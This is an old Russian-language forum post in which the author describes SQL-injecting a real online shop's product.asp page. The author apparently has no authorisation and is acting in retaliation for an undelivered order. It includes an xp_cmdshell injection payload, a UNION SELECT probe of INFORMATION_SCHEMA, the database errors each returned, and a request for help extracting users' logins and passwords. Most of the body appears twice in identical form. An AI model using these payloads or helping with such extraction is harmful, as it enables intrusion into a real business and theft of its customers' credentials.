[Tsh] *CorPSe*
07.03.2005, 20:15
Недавно Друг Сообщил Что Он Заказал MP3 С Интернет Магазина, Прошло 3 Месяца а MP3 Так и Не Пришел.
Я решил взгянуть на сайт этого магазина переход по страницам там такой:
/product.asp?f=1710
Я проверил следуйщий запрос (Проверить Тупость Админа):
/product.asp?f=1710%20%20';%20exec%20master..xp_cmd shell%20'ping%2010.10.1.2'%20--
В Ответ получил следуйщие:
-------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on object 'xp_cmdshell', database 'master', owner 'dbo'.
/includes/header.asp, line 17
------------------------------------------------------------
У админа есть немного мозгов =))
Другим запросом узнал название базы, НО когда пытаюсь выполнить запрос с UNION выдаёт следуйшие:
(Запрос был таков: /product.asp?f=1710 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--)
-------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
------------------------------------------------------------
Подскажи как получить название таблиц,логины,и пароли юзеров. Заранее Спасибо за помошь.
Я решил взгянуть на сайт этого магазина переход по страницам там такой:
/product.asp?f=1710
Я проверил следуйщий запрос (Проверить Тупость Админа):
/product.asp?f=1710%20%20';%20exec%20master..xp_cmd shell%20'ping%2010.10.1.2'%20--
В Ответ получил следуйщие:
-------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on object 'xp_cmdshell', database 'master', owner 'dbo'.
/includes/header.asp, line 17
------------------------------------------------------------
У админа есть немного мозгов =))
Другим запросом узнал название базы, НО когда пытаюсь выполнить запрос с UNION выдаёт следуйшие:
(Запрос был таков: /product.asp?f=1710 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--)
-------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
------------------------------------------------------------
Подскажи как получить название таблиц,логины,и пароли юзеров. Заранее Спасибо за помошь.